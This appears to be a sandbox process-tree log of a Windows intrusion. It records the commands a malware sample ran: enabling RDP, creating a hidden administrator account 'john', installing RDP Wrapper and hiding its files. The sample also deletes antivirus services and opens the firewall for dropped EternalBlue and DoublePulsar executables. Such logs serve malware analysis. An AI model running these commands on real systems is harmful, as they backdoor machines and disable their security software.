C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Modifies system certificate store
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt4⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer4⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_644⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_645⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2484⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2485⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1135⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1135⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.725⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.725⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.965⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.965⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.815⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.815⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.225⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.225⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1865⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1865⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1695⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1695⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.115⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.115⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2365⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2365⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.615⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.615⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1025⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1025⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1515⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1515⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.264⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.265⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.264⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.265⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.2304⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.2305⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.2304⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.2305⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
